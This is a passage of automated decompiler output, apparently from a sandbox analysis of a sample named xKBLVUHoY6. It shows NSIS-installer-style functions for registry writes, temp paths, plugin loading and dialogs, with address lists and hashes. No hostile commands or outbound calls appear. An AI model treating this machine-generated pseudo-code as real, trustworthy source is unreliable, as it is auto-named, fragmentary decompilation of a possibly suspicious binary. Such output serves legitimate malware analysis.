                                                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                				} else {
                                                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                					_t50 = 0;
                                                				}
                                                				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
                                                				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
                                                				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
                                                			}



















                                                0x00404d19
                                                0x00404d1e
                                                0x00404d26
                                                0x00404d27
                                                0x00404d34
                                                0x00404d3c
                                                0x00404d3d
                                                0x00404d3f
                                                0x00404d41
                                                0x00404d43
                                                0x00404d46
                                                0x00404d46
                                                0x00404d4d
                                                0x00404d53
                                                0x00404d53
                                                0x00404d5a
                                                0x00404d61
                                                0x00404d64
                                                0x00404d67
                                                0x00404d67
                                                0x00404d6b
                                                0x00404d7b
                                                0x00404d7d
                                                0x00404d80
                                                0x00404d29
                                                0x00404d29
                                                0x00404d30
                                                0x00404d30
                                                0x00404d88
                                                0x00404d93
                                                0x00404da9
                                                0x00404dba
                                                0x00404dd6

                                                APIs
                                                • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                • wsprintfW.USER32 ref: 00404DBA
                                                • SetDlgItemTextW.USER32 ref: 00404DCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: dd6052bb08b2cf0188f70179b0c63bbafe6d95c304151c4f0e040ce7d30f5014
                                                • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                                • Opcode Fuzzy Hash: dd6052bb08b2cf0188f70179b0c63bbafe6d95c304151c4f0e040ce7d30f5014
                                                • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                				void* _t20;
                                                				void* _t21;
                                                				int _t24;
                                                				int _t30;
                                                				intOrPtr _t33;
                                                				void* _t34;
                                                				intOrPtr _t37;
                                                				void* _t39;
                                                				void* _t42;
                                                
                                                				_t42 = __eflags;
                                                				_t33 = __edx;
                                                				_t30 = __ebx;
                                                				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                				_t34 = __eax;
                                                				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                				 *(_t39 - 0x44) = E00402DA6(2);
                                                				_t20 = E00402DA6(0x11);
                                                				 *(_t39 - 4) = 1;
                                                				_t21 = E00402E36(_t42, _t34, _t20, 2);
                                                				 *(_t39 + 8) = _t21;
                                                				if(_t21 != __ebx) {
                                                					_t24 = 0;
                                                					if(_t37 == 1) {
                                                						E00402DA6(0x23);
                                                						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
                                                					}
                                                					if(_t37 == 4) {
                                                						 *0x40b5c8 = E00402D84(3);
                                                						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                						_t24 = _t37;
                                                					}
                                                					if(_t37 == 3) {
                                                						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
                                                					}
                                                					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
                                                						 *(_t39 - 4) = _t30;
                                                					}
                                                					_push( *(_t39 + 8));
                                                					RegCloseKey();
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
                                                				return 0;
                                                			}












                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248d
                                                0x00402494
                                                0x0040249e
                                                0x004024a1
                                                0x004024aa
                                                0x004024b1
                                                0x004024b8
                                                0x004024bb
                                                0x004024c1
                                                0x004024cb
                                                0x004024cf
                                                0x004024da
                                                0x004024da
                                                0x004024e1
                                                0x004024eb
                                                0x004024f1
                                                0x004024f4
                                                0x004024f4
                                                0x004024f8
                                                0x00402504
                                                0x00402504
                                                0x0040251d
                                                0x0040251f
                                                0x0040251f
                                                0x00402522
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskE115.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskE115.tmp,00000000,00000011,00000002), ref: 00402515
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskE115.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nskE115.tmp
                                                • API String ID: 2655323295-1341008150
                                                • Opcode ID: 861f193ed713728b6608d55f4f34c9aa4f20ee75e1065734592e0effa691dc87
                                                • Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
                                                • Opcode Fuzzy Hash: 861f193ed713728b6608d55f4f34c9aa4f20ee75e1065734592e0effa691dc87
                                                • Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00405DD6(WCHAR* _a4) {
                                                				WCHAR* _t9;
                                                
                                                				_t9 = _a4;
                                                				_push( &(_t9[lstrlenW(_t9)]));
                                                				_push(_t9);
                                                				if( *(CharPrevW()) != 0x5c) {
                                                					lstrcatW(_t9, 0x40a014);
                                                				}
                                                				return _t9;
                                                			}




                                                0x00405dd7
                                                0x00405de4
                                                0x00405de5
                                                0x00405df0
                                                0x00405df8
                                                0x00405df8
                                                0x00405e00

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3081826266
                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E6EB810E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                				void* _v0;
                                                				void* _t27;
                                                				signed int _t29;
                                                				void* _t30;
                                                				void* _t34;
                                                				void* _t36;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t63;
                                                				void* _t64;
                                                				signed int _t66;
                                                				void* _t67;
                                                				void* _t73;
                                                				void* _t74;
                                                				void* _t77;
                                                				void* _t80;
                                                				void _t81;
                                                				void _t82;
                                                				intOrPtr _t84;
                                                				void* _t86;
                                                				void* _t88;
                                                
                                                				 *0x6eb8506c = _a8;
                                                				 *0x6eb85070 = _a16;
                                                				 *0x6eb85074 = _a12;
                                                				_a12( *0x6eb85048, E6EB81651, _t73);
                                                				_t66 =  *0x6eb8506c +  *0x6eb8506c * 4 << 3;
                                                				_t27 = E6EB812E3();
                                                				_v0 = _t27;
                                                				_t74 = _t27;
                                                				if( *_t27 == 0) {
                                                					L28:
                                                					return GlobalFree(_t27);
                                                				}
                                                				do {
                                                					_t29 =  *_t74 & 0x0000ffff;
                                                					_t67 = 2;
                                                					_t74 = _t74 + _t67;
                                                					_t88 = _t29 - 0x66;
                                                					if(_t88 > 0) {
                                                						_t30 = _t29 - 0x6c;
                                                						if(_t30 == 0) {
                                                							L23:
                                                							_t31 =  *0x6eb85040;
                                                							if( *0x6eb85040 == 0) {
                                                								goto L26;
                                                							}
                                                							E6EB81603( *0x6eb85074, _t31 + 4, _t66);
                                                							_t34 =  *0x6eb85040;
                                                							_t86 = _t86 + 0xc;
                                                							 *0x6eb85040 =  *_t34;
                                                							L25:
                                                							GlobalFree(_t34);
                                                							goto L26;
                                                						}
                                                						_t36 = _t30 - 4;
                                                						if(_t36 == 0) {
                                                							L13:
                                                							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E6EB81312(E6EB8135A(_t38));
                                                							L14:
                                                							goto L25;
                                                						}
                                                						_t40 = _t36 - _t67;
                                                						if(_t40 == 0) {
                                                							L11:
                                                							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E6EB81381(_t80, E6EB812E3());
                                                							goto L14;
                                                						}
                                                						L8:
                                                						if(_t40 == 1) {
                                                							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                							_t10 = _t81 + 4; // 0x4
                                                							E6EB81603(_t10,  *0x6eb85074, _t66);
                                                							_t86 = _t86 + 0xc;
                                                							 *_t81 =  *0x6eb85040;
                                                							 *0x6eb85040 = _t81;
                                                						}
                                                						goto L26;
                                                					}
                                                					if(_t88 == 0) {
                                                						_t48 =  *0x6eb85070;
                                                						_t77 =  *_t48;
                                                						 *_t48 =  *_t77;
                                                						_t49 = _v0;
                                                						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                							E6EB81603(_t49, _t77 + 8, 0x38);
                                                							_t86 = _t86 + 0xc;
                                                						}
                                                						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                						GlobalFree(_t77);
                                                						goto L26;
                                                					}
                                                					_t54 = _t29 - 0x46;
                                                					if(_t54 == 0) {
                                                						_t82 = GlobalAlloc(0x40,  *0x6eb8506c +  *0x6eb8506c + 8);
                                                						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                						_t14 = _t82 + 8; // 0x8
                                                						E6EB81603(_t14, _v0, 0x38);
                                                						_t86 = _t86 + 0xc;
                                                						 *_t82 =  *( *0x6eb85070);
                                                						 *( *0x6eb85070) = _t82;
                                                						goto L26;
                                                					}
                                                					_t63 = _t54 - 6;
                                                					if(_t63 == 0) {
                                                						goto L23;
                                                					}
                                                					_t64 = _t63 - 4;
                                                					if(_t64 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L13;
                                                					}
                                                					_t40 = _t64 - _t67;
                                                					if(_t40 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L11;
                                                					}
                                                					goto L8;
                                                					L26:
                                                				} while ( *_t74 != 0);
                                                				_t27 = _v0;
                                                				goto L28;
                                                			}


























                                                0x6eb810eb
                                                0x6eb81100
                                                0x6eb81109
                                                0x6eb8110e
                                                0x6eb81119
                                                0x6eb8111c
                                                0x6eb81125
                                                0x6eb81129
                                                0x6eb8112b
                                                0x6eb812b0
                                                0x6eb812ba
                                                0x6eb812ba
                                                0x6eb81132
                                                0x6eb81132
                                                0x6eb81137
                                                0x6eb81138
                                                0x6eb8113a
                                                0x6eb8113d
                                                0x6eb81256
                                                0x6eb81259
                                                0x6eb81271
                                                0x6eb81271
                                                0x6eb81278
                                                0x00000000
                                                0x00000000
                                                0x6eb81285
                                                0x6eb8128a
                                                0x6eb8128f
                                                0x6eb81294
                                                0x6eb8129a
                                                0x6eb8129b
                                                0x00000000
                                                0x6eb8129b
                                                0x6eb8125b
                                                0x6eb8125e
                                                0x6eb811bc
                                                0x6eb811bf
                                                0x6eb811c2
                                                0x6eb811cb
                                                0x6eb811d0
                                                0x00000000
                                                0x6eb811d1
                                                0x6eb81264
                                                0x6eb81266
                                                0x6eb811a2
                                                0x6eb811a5
                                                0x6eb811a8
                                                0x6eb811b1
                                                0x00000000
                                                0x6eb811b1
                                                0x6eb81164
                                                0x6eb81165
                                                0x6eb81177
                                                0x6eb81180
                                                0x6eb81184
                                                0x6eb8118e
                                                0x6eb81191
                                                0x6eb81193
                                                0x6eb81193
                                                0x00000000
                                                0x6eb81165
                                                0x6eb81143
                                                0x6eb81218
                                                0x6eb8121d
                                                0x6eb81221
                                                0x6eb81223
                                                0x6eb8122c
                                                0x6eb8122f
                                                0x6eb81238
                                                0x6eb8123d
                                                0x6eb8123d
                                                0x6eb81247
                                                0x6eb8124a
                                                0x00000000
                                                0x6eb81250
                                                0x6eb81149
                                                0x6eb8114c
                                                0x6eb811e9
                                                0x6eb811ed
                                                0x6eb811f7
                                                0x6eb811fb
                                                0x6eb81205
                                                0x6eb8120a
                                                0x6eb81211
                                                0x00000000
                                                0x6eb81211
                                                0x6eb81152
                                                0x6eb81155
                                                0x00000000
                                                0x00000000
                                                0x6eb8115b
                                                0x6eb8115e
                                                0x6eb811b8
                                                0x00000000
                                                0x6eb811b8
                                                0x6eb81160
                                                0x6eb81162
                                                0x6eb8119e
                                                0x00000000
                                                0x6eb8119e
                                                0x00000000
                                                0x6eb812a1
                                                0x6eb812a1
                                                0x6eb812ab
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 3a98336db2366fb45b3702a4eb5feef3d27d61cb04e63527d8fb889bf2c616ef
                                                • Instruction ID: 50081efeb43e36ad64bcbf7eb18182390f6fd23153788349296bd84a94fe2ad7
                                                • Opcode Fuzzy Hash: 3a98336db2366fb45b3702a4eb5feef3d27d61cb04e63527d8fb889bf2c616ef
                                                • Instruction Fuzzy Hash: A9519AB5802643DFDB44DFE8C844A6B7BE8EB1A318F084529E965DB310E735E908CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                				signed int _t14;
                                                				int _t17;
                                                				void* _t24;
                                                				intOrPtr* _t29;
                                                				void* _t31;
                                                				signed int _t32;
                                                				void* _t35;
                                                				void* _t40;
                                                				signed int _t42;
                                                
                                                				_t29 = __edi;
                                                				_t24 = __ebx;
                                                				_t14 =  *(_t35 - 0x28);
                                                				_t40 = __edx - 0x38;
                                                				 *(_t35 - 0x10) = _t14;
                                                				_t27 = 0 | _t40 == 0x00000000;
                                                				_t32 = _t40 == 0;
                                                				if(_t14 == __ebx) {
                                                					if(__edx != 0x38) {
                                                						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                					} else {
                                                						E00402DA6(0x21);
                                                						E00406529("C:\Users\jones\AppData\Local\Temp\nskE115.tmp", "C:\Users\jones\AppData\Local\Temp\nskE115.tmp\System.dll", 0x400);
                                                						_t17 = lstrlenA("C:\Users\jones\AppData\Local\Temp\nskE115.tmp\System.dll");
                                                					}
                                                				} else {
                                                					E00402D84(1);
                                                					 *0x40adc8 = __ax;
                                                					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                				}
                                                				 *(_t35 + 8) = _t17;
                                                				if( *_t29 == _t24) {
                                                					L13:
                                                					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                				} else {
                                                					_t31 = E00406467(_t27, _t29);
                                                					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060D8(_t31, _t31) >= 0) {
                                                						_t14 = E004060A9(_t31, "C:\Users\jones\AppData\Local\Temp\nskE115.tmp\System.dll",  *(_t35 + 8));
                                                						_t42 = _t14;
                                                						if(_t42 == 0) {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}












                                                0x0040263e
                                                0x0040263e
                                                0x0040263e
                                                0x00402643
                                                0x00402646
                                                0x00402649
                                                0x0040264e
                                                0x00402650
                                                0x00402670
                                                0x004026aa
                                                0x00402672
                                                0x00402674
                                                0x00402688
                                                0x00402695
                                                0x00402695
                                                0x00402652
                                                0x00402654
                                                0x00402659
                                                0x00402667
                                                0x0040266a
                                                0x004026af
                                                0x004026b2
                                                0x0040292e
                                                0x0040292e
                                                0x004026b8
                                                0x004026c1
                                                0x004026c3
                                                0x004026e2
                                                0x004015b4
                                                0x004015b6
                                                0x00000000
                                                0x004015bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004026c3
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nskE115.tmp$C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll
                                                • API String ID: 1659193697-1208131847
                                                • Opcode ID: 85f473177953107b28b6dbe9815c3a2c144e2e49782b1401e960188114f72f0e
                                                • Instruction ID: 065fa95b7f6ceba1475350b2e5fd0629383d1058fb688f50996a10954fc95768
                                                • Opcode Fuzzy Hash: 85f473177953107b28b6dbe9815c3a2c144e2e49782b1401e960188114f72f0e
                                                • Instruction Fuzzy Hash: D011E772B00305BBCB10BBB18E4AE9E76B0AF40749F21443FF002B62C1D6FD8891965E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403019(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					if( *0x420ec0 == 0) {
                                                						_t2 = GetTickCount();
                                                						if(_t2 >  *0x42a22c) {
                                                							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
                                                							 *0x420ec0 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00406910(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x420ec0;
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x420ec0 = 0;
                                                					return _t6;
                                                				}
                                                			}






                                                0x00403020
                                                0x00403040
                                                0x0040304a
                                                0x00403056
                                                0x00403067
                                                0x00403070
                                                0x00000000
                                                0x00403075
                                                0x0040307c
                                                0x00403042
                                                0x00403049
                                                0x00403049
                                                0x00403022
                                                0x00403022
                                                0x00403029
                                                0x0040302c
                                                0x0040302c
                                                0x00403032
                                                0x00403039
                                                0x00403039

                                                APIs
                                                • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                • CreateDialogParamW.USER32 ref: 00403067
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                                • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00405EDE(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				signed int _t23;
                                                
                                                				E00406507(0x425f10, _a4);
                                                				_t21 = E00405E81(0x425f10);
                                                				if(_t21 != 0) {
                                                					E0040678E(_t21);
                                                					if(( *0x42a238 & 0x00000080) == 0) {
                                                						L5:
                                                						_t23 = _t21 - 0x425f10 >> 1;
                                                						while(1) {
                                                							_t11 = lstrlenW(0x425f10);
                                                							_push(0x425f10);
                                                							if(_t11 <= _t23) {
                                                								break;
                                                							}
                                                							_t12 = E0040683D();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405E22(0x425f10);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E00405DD6();
                                                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}








                                                0x00405eea
                                                0x00405ef5
                                                0x00405ef9
                                                0x00405f00
                                                0x00405f0c
                                                0x00405f1c
                                                0x00405f1e
                                                0x00405f36
                                                0x00405f37
                                                0x00405f3e
                                                0x00405f3f
                                                0x00000000
                                                0x00000000
                                                0x00405f22
                                                0x00405f29
                                                0x00405f31
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f29
                                                0x00405f41
                                                0x00000000
                                                0x00405f55
                                                0x00405f0e
                                                0x00405f14
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f14
                                                0x00405efb
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                  • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
